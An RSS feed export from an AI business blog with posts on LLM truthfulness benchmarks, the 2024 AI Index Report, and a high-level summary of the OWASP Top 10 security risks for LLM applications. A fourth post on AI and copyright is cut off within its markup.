<?xml version="1.0" encoding="UTF-8" ?><!-- generator=Zoho Sites --><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><atom:link href="https://www.nownextlater.ai/Insights/tag/ai-risk-management/feed" rel="self" type="application/rss+xml"/><title>Now Next Later AI - Blog #AI Risk Management</title><description>Now Next Later AI - Blog #AI Risk Management</description><link>https://www.nownextlater.ai/Insights/tag/ai-risk-management</link><lastBuildDate>Wed, 26 Nov 2025 21:33:55 +1100</lastBuildDate><generator>http://zoho.com/sites/</generator><item><title><![CDATA[Measuring the Truthfulness of Large Language Models: Benchmarks, Challenges, and Implications for Business Leaders]]></title><link>https://www.nownextlater.ai/Insights/post/Measuring-the-Truthfulness-of-Large-Language-Models</link><description><![CDATA[<img align="left" hspace="5" src="https://www.nownextlater.ai/Screenshot 2024-04-29 at 12.56.35 pm.png"/>LLMs currently face significant challenges when it comes to truthfulness. Understanding these limitations is essential for any business considering leveraging LLMs.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_GVCHdVe6Q5O7K4Wm7HPPvg" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_b1wUWYpxS3yvxfwmmwjHMQ" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_n7uk0luTQAe-ggvG9QuZqg" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_As1QnLrVLRrkRjbbxVG6lw" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_As1QnLrVLRrkRjbbxVG6lw"] .zpimage-container figure img { width: 500px ; height: 477.31px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_As1QnLrVLRrkRjbbxVG6lw"] .zpimage-container figure img { width:500px ; height:477.31px ; } } @media (max-width: 767px) { [data-element-id="elm_As1QnLrVLRrkRjbbxVG6lw"] .zpimage-container figure img { width:500px ; height:477.31px ; } } [data-element-id="elm_As1QnLrVLRrkRjbbxVG6lw"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202024-04-29%20at%2012.56.35%E2%80%AFpm.png" width="500" height="477.31" loading="lazy" size="medium" alt="LLM misinformation" data-lightbox="true"/></picture></span><figcaption class="zpimage-caption zpimage-caption-align-center"><span class="zpimage-caption-content">LLM Misinformation</span></figcaption></figure></div>
</div><div data-element-id="elm_PUyJ5oo1S8KD7u631BYLWA" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_PUyJ5oo1S8KD7u631BYLWA"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-center " data-editor="true"><div style="color:inherit;text-align:left;"><p>In recent years, large language models (LLMs) like GPT-3, ChatGPT, and others have made stunning breakthroughs in natural language processing. These powerful AI systems can engage in human-like conversations, answer questions, write articles, and even generate code. Their potential to transform industries from customer service to content creation has captured the imagination of business leaders worldwide.</p><p><br></p><p>However, as companies rush to adopt LLMs, a critical question often goes overlooked - just how truthful and reliable are these systems? Can we trust the outputs of LLMs to be factual and free of misinformation or deception? As it turns out, LLMs currently face significant challenges when it comes to truthfulness. Understanding these limitations is essential for any business considering leveraging LLMs.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">The Hallucination Problem&nbsp;</span></p><p><br></p><p>One of the biggest issues with LLMs today is their tendency to &quot;hallucinate&quot; information - that is, to generate content that seems plausible but is not actually true. Because LLMs are trained on vast amounts of online data, they can pick up and parrot back common misconceptions, outdated facts, biases and outright falsehoods mixed in with truth.</p><p><br></p><p>An LLM may confidently assert something that sounds right but does not match reality. For example, an LLM might claim a fictional event from a book or movie actually happened in history. Or it may invent realistic-sounding but untrue details when asked about a topic it lacks knowledge of.</p><p><br></p><p>LLMs do not have a true understanding of the information they process - they work by recognizing and reproducing patterns of text. So they can combine ideas in seemingly coherent but inaccurate ways. This makes it difficult to always separate LLM fact from fiction.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Benchmarking LLM Truthfulness&nbsp;</span></p><p><br></p><p>To quantify just how prone LLMs are to truthful vs untruthful outputs, AI researchers have developed benchmark datasets to test these models. Two notable examples are:</p><ol><li><a href="https://arxiv.org/abs/2109.07958" title="TruthfulQA" rel="">TruthfulQA</a> (2022) - Contains 817 questions designed to elicit false answers that mimic human misconceptions across topics like health, law, and finance. Models are scored on how often they generate truthful responses.</li><li><a href="https://arxiv.org/abs/2305.11747" title="HaluEval" rel="">HaluEval</a> (2023) - Includes 35,000 examples of human-annotated or machine-generated &quot;hallucinated&quot; outputs for models to detect, across user queries, Q&amp;A, dialog and summarization. Measures model ability to discern truthful vs untruthful text.</li></ol><p><br></p><p>When tested on these benchmarks, even state-of-the-art LLMs struggle with truthfulness:</p><ul><li>On TruthfulQA, the best model was truthful only 58% of the time (vs 94% for humans). Larger models actually scored worse.</li><li>On HaluEval, models frequently failed to detect hallucinations, with accuracy barely above random chance in some cases. Hallucinated content often covered entities and topics the models lacked knowledge of.</li></ul><p><br></p><p>While providing knowledge or adding reasoning steps helped models somewhat, truthfulness remains an unsolved challenge. Models today are not reliable oracles of truth.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Implications for Businesses&nbsp;</span></p><p><br></p><p>The current limitations of LLMs in generating consistently truthful outputs has major implications for their practical use in business:</p><ol><li>Careful human oversight of LLM content is a must. Outputs cannot be blindly trusted as true without verification from authoritative sources.</li><li>LLMs are not suitable for high-stakes domains like healthcare, finance, or legal advice where inaccuracies pose unacceptable risks. More narrow, specialized and validated knowledge bases are needed.</li><li>Using LLMs for content generation requires clear disclosure that output may not be entirely factual. Audiences should be informed on the role and limitations of AI.</li><li>&quot;Prompt engineering&quot; and other filtering techniques to coax more truthful responses have limits. Changes to underlying training data and architectures are needed for major improvements.</li></ol><p><br></p><p>As research continues to progress, we can expect to see more truthful and dependable LLMs over time. Providing models with curated factual knowledge, better reasoning abilities, and alignment with human values are promising directions.</p><p><br></p><p>But for now, business leaders eager to harness the power of LLMs must temper their expectations around truthfulness. Treating these AIs as helpful assistants to augment and accelerate human knowledge work, while keeping a human in the loop to validate outputs, is the prudent approach. The truth is, LLMs still have a ways to go before they can be fully trusted as reliably truthful.</p></div><p></p></div>
</div><div data-element-id="elm_TIg9LdfKuCtOhXsFxtQFeA" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_TIg9LdfKuCtOhXsFxtQFeA"] .zpimage-container figure img { width: 500px ; height: 500.00px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_TIg9LdfKuCtOhXsFxtQFeA"] .zpimage-container figure img { width:500px ; height:500.00px ; } } @media (max-width: 767px) { [data-element-id="elm_TIg9LdfKuCtOhXsFxtQFeA"] .zpimage-container figure img { width:500px ; height:500.00px ; } } [data-element-id="elm_TIg9LdfKuCtOhXsFxtQFeA"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium "><figure role="none" class="zpimage-data-ref"><a class="zpimage-anchor" href="/introduction-to-large-language-models-for-business-leaders-book" target="" rel=""><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/12.png" width="500" height="500.00" loading="lazy" size="medium" alt="Intro to LLMs for Business Leaders"/></picture></a></figure></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Mon, 29 Apr 2024 13:00:10 +1000</pubDate></item><item><title><![CDATA[The Evolving Landscape of AI Benchmarks: What Business Leaders Need to Know]]></title><link>https://www.nownextlater.ai/Insights/post/the-evolving-landscape-of-ai-benchmarks-what-business-leaders-need-to-know</link><description><![CDATA[In this article, we'll dive into the key findings of the 2024 AI Index Report, focusing on benchmarks for truthfulness, reasoning, and agent-based systems, and explore their implications for businesses.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_d6jrsaerT8Wk036kXfwj6w" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_zymuYnFXQ8SbQQ6USGDgaA" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_iFEqlf-FR9GDCAqyQIMU1A" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_bXqfnlKqKpcgU4oFYW4LVg" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_bXqfnlKqKpcgU4oFYW4LVg"] .zpimage-container figure img { width: 1090px ; height: 414.44px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_bXqfnlKqKpcgU4oFYW4LVg"] .zpimage-container figure img { width:723px ; height:274.90px ; } } @media (max-width: 767px) { [data-element-id="elm_bXqfnlKqKpcgU4oFYW4LVg"] .zpimage-container figure img { width:415px ; height:157.79px ; } } [data-element-id="elm_bXqfnlKqKpcgU4oFYW4LVg"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-fit zpimage-tablet-fallback-fit zpimage-mobile-fallback-fit hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202024-04-29%20at%2010.20.30%E2%80%AFam.png" width="415" height="157.79" loading="lazy" size="fit" alt="Truthfulness Benchmarks" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_uGoYnXzASmSIem9JkmLnHQ" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_uGoYnXzASmSIem9JkmLnHQ"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-center " data-editor="true"><div style="color:inherit;text-align:left;"><div style="color:inherit;"><p>As AI technologies continue to advance at a rapid pace, business leaders must stay informed about the latest trends and developments to make strategic decisions about AI adoption and deployment. The <a href="https://aiindex.stanford.edu/report/" title="2024 AI Index Report" rel="">2024 AI Index Report</a> from the Stanford Institute for Human-Centered Artificial Intelligence (HAI) offers valuable insights into the current state of AI benchmarks, which are standardized tests used to evaluate the performance of AI systems. In this article, we'll dive into the key findings of the report, focusing on benchmarks for truthfulness, reasoning, and agent-based systems, and explore their implications for businesses.</p><p></p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">The Importance of Evolving Benchmarks&nbsp;</span></p><p><br></p><p>AI benchmarks play a crucial role in assessing the capabilities of AI systems and tracking progress over time. However, as AI models become more sophisticated, traditional benchmarks like ImageNet (for image recognition) and SQuAD (for question answering) are becoming less effective at differentiating state-of-the-art systems. This saturation has led researchers to develop more challenging benchmarks that better reflect real-world performance requirements. For business leaders, it's essential to understand that relying solely on outdated benchmarks may not provide an accurate picture of an AI solution's true capabilities.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Truthfulness Benchmarks: Ensuring Reliable AI-Generated Content&nbsp;</span></p><p><br></p><p>One of the key concerns for businesses looking to deploy AI solutions is the truthfulness and reliability of AI-generated content. With the rise of powerful language models like GPT-4, the risk of AI systems producing false or misleading information (known as &quot;hallucinations&quot;) has become a significant challenge. Benchmarks like TruthfulQA and HaluEval have been developed to evaluate the factuality of language models and measure their propensity for hallucination.</p><p><br></p><p>TruthfulQA, for example, tests a model's ability to generate truthful answers to questions, while HaluEval assesses the frequency and severity of hallucinations across various tasks like question answering and text summarization. Business leaders should be aware of these benchmarks and consider them when evaluating AI solutions for content generation and decision support, particularly in industries where accuracy is critical, such as healthcare, finance, and legal services.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Reasoning Benchmarks: Assessing AI's Problem-Solving Capabilities&nbsp;</span></p><p><br></p><p>As businesses explore the potential of AI for complex problem-solving and decision-making, understanding the reasoning capabilities of AI systems is crucial. The 2024 AI Index Report highlights several new benchmarks designed to test AI's ability to reason across different domains, such as visual reasoning, moral reasoning, and social reasoning.</p><p><br></p><p>One notable example is the MMMU (Massive Multi-discipline Multimodal Understanding and Reasoning Benchmark for Expert AGI), which evaluates AI systems' ability to reason across various academic disciplines using multiple input modalities (e.g., text, images, and tables). Another benchmark, GPQA (Graduate-Level Google-Proof Q&amp;A Benchmark), tests AI's capacity to answer complex, graduate-level questions that cannot be easily found through a Google search.</p><p><br></p><p>While state-of-the-art models like GPT-4 and Gemini Ultra have demonstrated impressive performance on these benchmarks, they still fall short of human-level reasoning in many areas. Business leaders should monitor progress on these benchmarks to better assess the readiness of AI solutions for their specific use cases and understand the limitations of current AI reasoning capabilities.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Agent-Based Systems: Evaluating Autonomous AI Performance</span></p><p><br></p><p>Autonomous AI agents, which can operate independently in specific environments to accomplish goals, have significant potential for businesses across various domains, from customer service to supply chain optimization. The 2024 AI Index Report introduces AgentBench, a new benchmark designed to evaluate the performance of AI agents in interactive settings like web browsing, online shopping, and digital card games.</p><p><br></p><p>AgentBench also compares the performance of agents based on different language models, such as GPT-4 and Claude 2. The report finds that GPT-4-based agents generally outperform their counterparts, but all agents struggle with long-term reasoning, decision-making, and instruction-following. For businesses considering deploying AI agents, these findings underscore the importance of thorough testing and the need for human oversight and intervention.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Alignment Techniques: RLHF vs. RLAIF&nbsp;</span></p><p><br></p><p>As businesses deploy AI systems, ensuring that they behave in accordance with human preferences and values is a key concern. Reinforcement Learning from Human Feedback (RLHF) has emerged as a popular technique for aligning AI models with human preferences. RLHF involves training AI systems using human feedback to reward desired behaviors and punish undesired ones.</p><p><br></p><p>However, the 2024 AI Index Report also highlights a new alignment technique called Reinforcement Learning from AI Feedback (RLAIF), which uses feedback from AI models themselves to align other AI systems. Research suggests that RLAIF can be as effective as RLHF while being more resource-efficient, particularly for tasks like generating safe and harmless dialogue. For businesses, the development of more efficient alignment techniques like RLAIF could make it easier and less costly to deploy AI systems that behave in accordance with company values and objectives.</p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;"><br></span></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Emergent Behavior and Self-Correction: Challenging Common Assumptions&nbsp;</span></p><p><br></p><p>The 2024 AI Index Report also features research that challenges two common assumptions about AI systems: the notion of emergent behavior and the ability of language models to self-correct.</p><p><br></p><p>Emergent behavior refers to the idea that AI systems can suddenly develop new capabilities when scaled up to larger sizes. However, a study from Stanford suggests that the perceived emergence of new abilities may be more a reflection of the benchmarks used for evaluation rather than an inherent property of the models themselves. This finding emphasizes the importance of thoroughly testing and validating AI systems before deployment, rather than relying on assumptions about their potential for unexpected improvements.</p><p><br></p><p>Another study highlighted in the report investigates the ability of language models to self-correct their reasoning. While self-correction has been proposed as a solution to the limitations and hallucinations of language models, the research finds that models like GPT-4 struggle to autonomously correct their reasoning without external guidance. This underscores the ongoing need for human oversight and the development of external correction mechanisms.</p><p><br></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Techniques for Improving Language Models&nbsp;</span></p><p><br></p><p>As businesses deploy language models for various applications, from customer service to content creation, the efficiency and performance of these models become critical considerations. The 2024 AI Index Report showcases several promising techniques for enhancing the performance of language models:</p><ol><li>Graph of Thoughts (GoT) Prompting: A prompting method that enables language models to reason more flexibly by modeling their thoughts in a graph-like structure, leading to improved output quality and reduced computational costs.</li><li>Optimization by PROmpting (OPRO): A technique that uses language models to iteratively generate prompts that improve algorithmic performance on specific tasks.</li><li>QLoRA Fine-Tuning: A fine-tuning method that significantly reduces the memory requirements for adapting large language models to specific tasks, making the process more efficient and accessible.</li><li>Flash-Decoding Optimization: An optimization technique that speeds up the inference process for language models, particularly in tasks requiring long sequences, by parallelizing the loading of keys and values.</li></ol><p><br></p><p>By staying informed about these developments, business leaders can make more strategic decisions about their AI investments and implementations, prioritizing techniques that enhance performance, reduce costs, and align with their specific use cases.</p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;"><br></span></p><p><span style="font-family:&quot;Archivo Black&quot;, sans-serif;">Conclusion</span></p><p><br></p><p>The 2024 AI Index Report offers valuable insights into the evolving landscape of AI benchmarks and their implications for businesses. As AI systems become more powerful and ubiquitous, it is crucial for business leaders to understand the latest trends in benchmarking, alignment techniques, and performance optimization.</p><p><br></p><p>By monitoring progress on benchmarks for truthfulness, reasoning, and agent-based systems, businesses can better assess the capabilities and limitations of AI solutions and make informed decisions about their adoption and deployment. Additionally, staying attuned to developments in alignment techniques like RLAIF and performance optimization methods like GoT prompting and Flash-Decoding can help businesses navigate the complex landscape of AI and harness its potential for growth and innovation.</p><p><br></p><p>Ultimately, the key takeaway for business leaders is the importance of thorough testing, validation, and ongoing monitoring of AI systems. By relying on the latest benchmarks, challenging assumptions about emergent behavior and self-correction, and prioritizing human oversight and external correction mechanisms, businesses can responsibly and effectively leverage AI technologies to drive their success in an increasingly competitive landscape.</p></div></div><p></p></div>
</div><div data-element-id="elm_cOw77h_V65rdzgMQvXS0tQ" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_cOw77h_V65rdzgMQvXS0tQ"] .zpimage-container figure img { width: 800px ; height: 344.00px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_cOw77h_V65rdzgMQvXS0tQ"] .zpimage-container figure img { width:500px ; height:215.00px ; } } @media (max-width: 767px) { [data-element-id="elm_cOw77h_V65rdzgMQvXS0tQ"] .zpimage-container figure img { width:500px ; height:215.00px ; } } [data-element-id="elm_cOw77h_V65rdzgMQvXS0tQ"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-large zpimage-tablet-fallback-large zpimage-mobile-fallback-large "><figure role="none" class="zpimage-data-ref"><a class="zpimage-anchor" href="/aibooks" target="" rel=""><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Untitled%20design%20-4-.png" width="500" height="215.00" loading="lazy" size="large" alt="Generative AI Books for Business Leaders"/></picture></a></figure></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Mon, 29 Apr 2024 10:25:24 +1000</pubDate></item><item><title><![CDATA[The Top 10 Risks Business Leaders Need to Know About Large Language Models]]></title><link>https://www.nownextlater.ai/Insights/post/the-top-10-risks-business-leaders-need-to-know-about-large-language-models</link><description><![CDATA[<img align="left" hspace="5" src="https://www.nownextlater.ai/1697599021768.jpeg"/>Recently, the Open Web Application Security Project (OWASP), a leading authority on cybersecurity, released their list of the Top 10 security risks for LLM applications. Here is what every executive should know about these critical LLM vulnerabilities.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_WSL7nXQ9SwGjiikEeJ1PGQ" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_0oHwNQrTSKeHuGlFD8nbqQ" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_T83VkOeqStSji-4xWuFbtw" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_dmMIJ43fKdKDQ2Me-6u85w" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_dmMIJ43fKdKDQ2Me-6u85w"] .zpimage-container figure img { width: 1090px ; height: 613.13px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_dmMIJ43fKdKDQ2Me-6u85w"] .zpimage-container figure img { width:723px ; height:406.69px ; } } @media (max-width: 767px) { [data-element-id="elm_dmMIJ43fKdKDQ2Me-6u85w"] .zpimage-container figure img { width:415px ; height:233.44px ; } } [data-element-id="elm_dmMIJ43fKdKDQ2Me-6u85w"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-fit zpimage-tablet-fallback-fit zpimage-mobile-fallback-fit hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/1697599021768.jpeg" width="415" height="233.44" loading="lazy" size="fit" alt="OWASP Top 10 for LLM Apps" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_GurYT3FqQQCsM7DOfGAsKQ" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_GurYT3FqQQCsM7DOfGAsKQ"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-center " data-editor="true"><div style="color:inherit;text-align:left;"><p style="font-weight:400;text-indent:0px;">The rapid rise of AI-powered chatbots and large language models like ChatGPT is transforming how businesses operate and engage with customers. These systems, built on large language models (LLMs) trained on massive datasets, offer exciting new capabilities—from generating human-like text to powering interactive virtual assistants. However, as with any powerful new technology, LLMs also introduce new risks that business leaders need to understand and mitigate.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Recently, the Open Web Application Security Project (OWASP), a leading authority on cybersecurity, released their list of the <a href="https://www.llmtop10.com/" title="Top 10 security risks for LLM applications" rel="">Top 10 security risks for LLM applications</a>. Here is what every executive should know about these critical LLM vulnerabilities:</p><p style="font-weight:400;text-indent:0px;"></p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;"><span style="font-family:&quot;Oswald&quot;, sans-serif;font-size:20px;color:rgb(41, 77, 135);">The OWASP Top 10 Risks for LLM Applications</span></p><p style="font-weight:400;text-indent:0px;"></p><div style="color:inherit;"><ol><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Prompt Injection:</span><span style="color:rgb(41, 77, 135);"></span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"> Attackers can manipulate the LLM to execute unintended actions by &quot;injecting&quot; malicious instructions. This could lead to data theft, privilege escalation, and more.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Insecure Output Handling:</span><span style="color:rgb(41, 77, 135);">&nbsp;</span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"><span></span>If an application blindly accepts LLM outputs without proper validation, it exposes backend systems to potential exploits like cross-site scripting (XSS) attacks.</span></span></li><li><span><span style="font-size:16px;"><span style="color:rgb(41, 77, 135);">Training Data Poisoning: </span></span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;">LLMs are only as good as their training data. Manipulation of training datasets can introduce harmful biases, vulnerabilities, or enable backdoor access.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Model Denial of Service: </span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;">Resource-intensive LLM operations triggered by attackers can degrade system performance and drive up computing costs.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Supply Chain Vulnerabilities:</span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"> Compromised data, models, or components anywhere in the complex LLM development lifecycle introduces risks.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Sensitive Information Disclosure: </span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;">LLMs may inadvertently reveal confidential data in generated outputs, violating data privacy.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Insecure Plugin Design:</span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"> Extensible LLM plugins with poor input validation or access control are easier for attackers to exploit.</span></span></li><li><span><span style="font-size:16px;"><span style="color:rgb(41, 77, 135);">Excessive Agency:</span></span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"> Granting an LLM too much functionality, autonomy or privilege amplifies the impact of any vulnerabilities.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Overreliance: </span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;">Uncritically trusting LLM outputs without human oversight can propagate misinformation, bias, and security issues at scale.</span></span></li><li><span><span style="font-size:16px;color:rgb(41, 77, 135);">Model Theft:</span></span><span style="color:inherit;"><span style="font-weight:400;text-indent:0px;"> Exfiltration of proprietary LLM models is a threat to intellectual property and can enable reverse engineering of sensitive training data.</span></span></li></ol></div><p style="font-weight:400;text-indent:0px;"></p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;"><span style="font-family:&quot;Oswald&quot;, sans-serif;font-size:20px;color:rgb(41, 77, 135);">Key Takeaways for Business Leaders</span></p><p style="font-weight:400;text-indent:0px;"></p><ul><li>Conduct a thorough risk assessment and threat modeling exercise before deploying any LLM application. Understand your organization's specific threat landscape.</li><li>Ensure strong access controls, monitoring, and security safeguards are in place across the entire LLM lifecycle—from initial model training to production deployment.</li><li>Establish clear policies and staff training around responsible LLM use. Humans should remain in the loop for high-stakes decisions.</li><li>Evaluate the security practices of any vendors or third-party LLM components. The security of your LLM application is only as strong as its weakest link.</li><li>Keep abreast of this rapidly evolving risk landscape. Follow OWASP and other leading voices in AI security research to stay current on emerging LLM threats and countermeasures.</li></ul><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">The potential of large language models is immense—but so are the risks they pose if not properly understood and mitigated. By taking proactive steps to address the OWASP Top 10 LLM risks, business leaders can harness the power of this transformative technology more securely and strategically. After all, responsible stewardship of AI systems is quickly becoming a core business imperative.</p></div><p></p></div>
</div><div data-element-id="elm_lkdBDpf4VamhQKc_rPP4_A" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_lkdBDpf4VamhQKc_rPP4_A"] .zpimage-container figure img { width: 500px ; height: 500.00px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_lkdBDpf4VamhQKc_rPP4_A"] .zpimage-container figure img { width:500px ; height:500.00px ; } } @media (max-width: 767px) { [data-element-id="elm_lkdBDpf4VamhQKc_rPP4_A"] .zpimage-container figure img { width:500px ; height:500.00px ; } } [data-element-id="elm_lkdBDpf4VamhQKc_rPP4_A"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium "><figure role="none" class="zpimage-data-ref"><a class="zpimage-anchor" href="/responsible-ai-in-the-age-of-generative-models-ai-governance-ethics-and-risk-management" target="" rel=""><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Navy%20and%20Blue%20Modern%20We%20Provide%20Business%20Solutions%20Facebook%20Ad%20-1200%20x%201200%20px-.png" width="500" height="500.00" loading="lazy" size="medium" alt="AI Governance Books for Leaders"/></picture></a></figure></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Thu, 04 Apr 2024 16:21:55 +1100</pubDate></item><item><title><![CDATA[Navigating the Murky Waters of AI and Copyright]]></title><link>https://www.nownextlater.ai/Insights/post/Navigating-the-Murky-Waters-of-AI-and-Copyright</link><description><![CDATA[How exactly should business leaders navigate the complex intersection between AI creation and existing copyright laws? A new research paper by legal scholar Dr Andres Guadamuz provides an enlightening analysis of this murky terrain.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_z4uqCdUFQrqnZEgldwLQlw" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_aOWQ2USmTbmP023Qv0rTBA" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_ORawxEK0SH-HOkckCTZ-Dw" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_1fgfd69wX4lJTXbkM4fBHA" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_1fgfd69wX4lJTXbkM4fBHA"] .zpimage-container figure img { width: 1090px ; height: 568.94px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_1fgfd69wX4lJTXbkM4fBHA"] .zpimage-container figure img { width:723px ; height:377.38px ; } } @media (max-width: 767px) { [data-element-id="elm_1fgfd69wX4lJTXbkM4fBHA"] .zpimage-container figure img { width:415px ; height:216.61px ; } } [data-element-id="elm_1fgfd69wX4lJTXbkM4fBHA"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" 